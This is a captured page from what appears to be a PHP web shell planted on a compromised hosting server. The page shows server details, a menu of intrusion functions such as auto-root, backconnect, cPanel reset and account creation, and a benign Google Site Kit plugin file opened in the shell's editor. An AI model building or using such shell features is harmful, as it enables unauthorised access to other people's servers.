Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.129.194.182
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
temmmp /
anonmags.com /
wp-content /
plugins /
google-site-kit /
includes /
Modules /
Analytics_4 /
Report /
Dimension_Filter /
[ HOME SHELL ]
Name
Size
Permission
Action
Filter.php
1
KB
-rw-r--r--
In_List_Filter.php
1.68
KB
-rw-r--r--
String_Filter.php
3.62
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Filter.php
<?php /** * Class Google\Site_Kit\Modules\Analytics_4\Report\Dimension_Filter\Filter * * @package Google\Site_Kit\Modules\Analytics_4\Report\Dimension_Filter * @copyright 2023 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Modules\Analytics_4\Report\Dimension_Filter; use Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\FilterExpression as Google_Service_AnalyticsData_FilterExpression; /** * Interface for a dimension filter class. * * @since 1.106.0 */ interface Filter { /** * Converts the dimension filter into the GA4 compatible dimension filter expression. * * @since 1.106.0 * * @param string $dimension_name The dimension name. * @param mixed $dimension_value The dimension filter value. * @return Google_Service_AnalyticsData_FilterExpression The filter expression instance. */ public function parse_filter_expression( $dimension_name, $dimension_value ); }
Close